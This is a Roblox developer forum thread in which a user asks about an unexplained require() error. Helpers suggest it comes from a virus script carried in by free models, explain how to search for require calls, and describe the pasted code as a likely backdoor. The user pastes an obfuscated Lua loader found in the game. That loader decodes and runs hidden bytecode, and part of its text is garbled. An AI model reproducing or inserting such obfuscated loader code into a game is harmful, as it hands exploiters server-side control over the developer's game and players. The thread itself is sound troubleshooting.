I think this is a virus! Seeing a require I did not add

So when I log into the game it puts a script into a part and has this error

When I hover over it, it says

Something about my glasses on my avatar.

I only put this because I love a clean output and this bothers me.


i think your glasses have a script in them, and accessories are not supposed to have scripts inside of them, or roblox just messed up some stuff while loading your accessories

Oh Ok

This is it

Seems to be a different asset number.

It might not be my glasses I found it the script in exploer.


When I delete it it still give the error.

A script is trying to require an asset which does not contain a ModuleScript named "MainModule, specifically this asset which was deleted.

Quick edit, i forgot to mention that if this isn’t something you programmed in yourself i would delete whatever script is doing so.

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I did not make this and I can not find what is doing it.

Since it is a require you can simply go into studio, then into the View tab and open up “Find all / Replace all”

In there you can simply type “require” like seen below, you simply have to go through the scripts that come up in the search. If there is anything you did not add you should delete it, if you are uncertain feel free to show me what comes up.

It might still have to do with my glasses though.

Scripts cannot be added to accessories, it is most likely a “virus script”. If you frequently use sketchy plugins or freemodels then this is not a rare occurrance.

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I do not use these frequently.

How do I get rid of it???

Becuase I dont want a virus.

So if the virus is getting a error is it not working.

This has been happening to me since day 1 of working on this game there was also a script with no title and noting in it but never this error.

If you click the guy who made that thing my game is trying to find his ROBLOX profile is deleted.

COuld not find anything using this.


Seems to be from that script

Scroll and see the script
return(function(lo_h,lo_a,lo_a)local lo_j=string.char;local lo_e=string.sub;local lo_o=table.concat;local lo_n=math.ldexp;local lo_m=getfenv or function()return _ENV end;local lo_k=select;local lo_a=unpack or table.unpack;local lo_l=tonumber;local function lo_p(lo_h)local lo_b,lo_c,lo_d="","",{}local lo_g=256;local lo_f={}for lo_a=0,lo_g-1 do lo_f[lo_a]=lo_j(lo_a)end;local lo_a=1;local function lo_i()local lo_b=lo_l(lo_e(lo_h,lo_a,lo_a),36)lo_a=lo_a+1;local lo_c=lo_l(lo_e(lo_h,lo_a,lo_a+lo_b-1),36)lo_a=lo_a+lo_b;return lo_c end;lo_b=lo_j(lo_i())lo_d[1]=lo_b;while lo_a<#lo_h do local lo_a=lo_i()if lo_f[lo_a]then lo_c=lo_f[lo_a]else lo_c=lo_b…lo_e(lo_b,1,1)end;lo_f[lo_g]=lo_b…lo_e(lo_c,1,1)lo_d[#lo_d+1],lo_b,lo_g=lo_c,lo_c,lo_g+1 end;return table.concat(lo_d)end;local lo_i=lo_p(‘121627514112751623822R23B23723327B141327923A23823322W23627927923224A21Y27925I23L23G1D26T21Z27P1B2791K172792852752841628514279101527927I285285121C28G28A1628K2791F28N289275287161K1D28N28F28M27628N28P2751A28S28V28V28X29327P27I29228728R28U27P’);local lo_a=(bit or bit32);local lo_d=lo_a and lo_a.bxor or function(lo_a,lo_c)local lo_b,lo_d,lo_e=1,0,10 while lo_a>0 and lo_c>0 do local lo_e,lo_f=lo_a%2,lo_c%2 if lo_e~=lo_f then lo_d=lo_d+lo_b end lo_a,lo_c,lo_b=(lo_a-lo_e)/2,(lo_c-lo_f)/2,lo_b2 end if lo_a<lo_c then lo_a=lo_c end while lo_a>0 do local lo_c=lo_a%2 if lo_c>0 then lo_d=lo_d+lo_b end lo_a,lo_b=(lo_a-lo_c)/2,lo_b2 end return lo_d end local function lo_c(lo_b,lo_a,lo_c)if lo_c then local lo_a=(lo_b/2^(lo_a-1))%2^((lo_c-1)-(lo_a-1)+1);return lo_a-lo_a%1;else local lo_a=2^(lo_a-1);return(lo_b%(lo_a+lo_a)>=lo_a)and 1 or 0;end;end;local lo_a=1;local function lo_b()local lo_f,lo_e,lo_c,lo_b=lo_h(lo_i,lo_a,lo_a+3);lo_f=lo_d(lo_f,6)lo_e=lo_d(lo_e,6)lo_c=lo_d(lo_c,6)lo_b=lo_d(lo_b,6)lo_a=lo_a+4;return(lo_b16777216)+(lo_c65536)+(lo_e256)+lo_f;end;local function lo_g()local lo_b=lo_d(lo_h(lo_i,lo_a,lo_a),6);lo_a=lo_a+1;return lo_b;end;local function lo_f()local lo_b,lo_c=lo_h(lo_i,lo_a,lo_a+2);lo_b=lo_d(lo_b,6)lo_c=lo_d(lo_c,6)lo_a=lo_a+2;return(lo_c256)+lo_b;end;local function lo_l()local lo_a=lo_b();local lo_b=lo_b();local lo_e=1;local lo_d=(lo_c(lo_b,1,20)(2^32))+lo_a;local lo_a=lo_c(lo_b,21,31);local lo_b=((-1)^lo_c(lo_b,32));if(lo_a==0)then if(lo_d==0)then return lo_b0;else lo_a=1;lo_e=0;end;elseif(lo_a==2047)then return(lo_d==0)and(lo_b*(1/0))or(lo_b*(0/0));end;return lo_n(lo_b,lo_a-1023)*(lo_e+(lo_d/(2^52)));end;local lo_n=lo_b;local function lo_p(lo_b)local lo_c;if(not lo_b)then lo_b=lo_n();if(lo_b==0)then return’’;end;end;lo_c=lo_e(lo_i,lo_a,lo_a+lo_b-1);lo_a=lo_a+lo_b;local lo_b={}for lo_a=1,#lo_c do lo_b[lo_a]=lo_j(lo_d(lo_h(lo_e(lo_c,lo_a,lo_a)),6))end return lo_o(lo_b);end;local lo_a=lo_b;local function lo_n(…)return{…},lo_k(’#’,…)end local function lo_j()local lo_i={};local lo_e={};local lo_a={};local lo_h={[#{{953;707;757;689};“1 + 1 = 111”;}]=lo_e,[#{“1 + 1 = 111”;“1 + 1 = 111”;“1 + 1 = 111”;}]=nil,[#{{458;14;430;230};{570;964;232;128};“1 + 1 = 111”;“1 + 1 = 111”;}]=lo_a,[#{“1 + 1 = 111”;}]=lo_i,};local lo_a=lo_b()local lo_d={}for lo_c=1,lo_a do local lo_b=lo_g();local lo_a;if(lo_b==3)then lo_a=(lo_g()~=0);elseif(lo_b==0)then lo_a=lo_l();elseif(lo_b==2)then lo_a=lo_p();end;lo_d[lo_c]=lo_a;end;for lo_a=1,lo_b()do lo_e[lo_a-1]=lo_j();end;for lo_h=1,lo_b()do local lo_a=lo_g();if(lo_c(lo_a,1,1)==0)then local lo_e=lo_c(lo_a,2,3);local lo_g=lo_c(lo_a,4,6);local lo_a={lo_f(),lo_f(),nil,nil};if(lo_e==0)then lo_a[3]=lo_f();lo_a[4]=lo_f();elseif(lo_e==1)then lo_a[3]=lo_b();elseif(lo_e==2)then lo_a[3]=lo_b()-(2^16)elseif(lo_e==3)then lo_a[3]=lo_b()-(2^16)lo_a[4]=lo_f();end;if(lo_c(lo_g,1,1)==1)then lo_a[2]=lo_d[lo_a[2]]end if(lo_c(lo_g,2,2)==1)then lo_a[3]=lo_d[lo_a[3]]end if(lo_c(lo_g,3,3)==1)then lo_a[4]=lo_d[lo_a[4]]end lo_i[lo_h]=lo_a;end end;lo_h[3]=lo_g();return lo_h;end;local function lo_l(lo_a,lo_b,lo_g)lo_a=(lo_a==true and lo_j())or lo_a;return(function(…)local lo_h=lo_a[1];local lo_c=lo_a[3];local lo_a=lo_a[2];local lo_a=lo_n local lo_d=1;local lo_a=-1;local lo_i={};local lo_f={…};local lo_e=lo_k(’#’,…)-1;local lo_a={};local lo_b={};for lo_a=0,lo_e do if(lo_a>=lo_c)then lo_i[lo_a-lo_c]=lo_f[lo_a+1];else lo_b[lo_a]=lo_f[lo_a+#{{282;51;875;941};}];end;end;local lo_a=lo_e-lo_c+1 local lo_a;local lo_c;while true do lo_a=lo_h[lo_d];lo_c=lo_a[1];if lo_c<=5 then if lo_c<=2 then if lo_c<=0 then lo_b[lo_a[2]]=lo_g[lo_a[3]];elseif lo_c==1 then lo_b[lo_a[2]]=lo_g[lo_a[3]];else lo_b[lo_a[2]]=lo_a[3];end;elseif lo_c<=3 then if(lo_b[lo_a[2]]~=lo_b[lo_a[4]])then lo_d=lo_d+1;else lo_d=lo_a[3];end;elseif lo_c==4 then do return end;else local lo_a=lo_a[2]lo_blo_aend;elseif lo_c<=8 then if lo_c<=6 then if(lo_b[lo_a[2]]~=lo_b[lo_a[4]])then lo_d=lo_d+1;else lo_d=lo_a[3];end;elseif lo_c==7 then lo_d=lo_a[3];else local lo_a=lo_a[2]lo_blo_aend;elseif lo_c<=9 then do return end;elseif lo_c>10 then lo_b[lo_a[2]]=lo_a[3];else lo_d=lo_a[3];end;lo_d=lo_d+1;end;end);end;return lo_l(true,{},lo_m())();end)(string.byte,table.insert,setmetatable);strong text

This is the script that I found.

Is my game runined now!!!?!?!?!!?

This seems like a obfuscated script, most likely a backdoor or a malicious script intended to give exploiters server-sided code execution.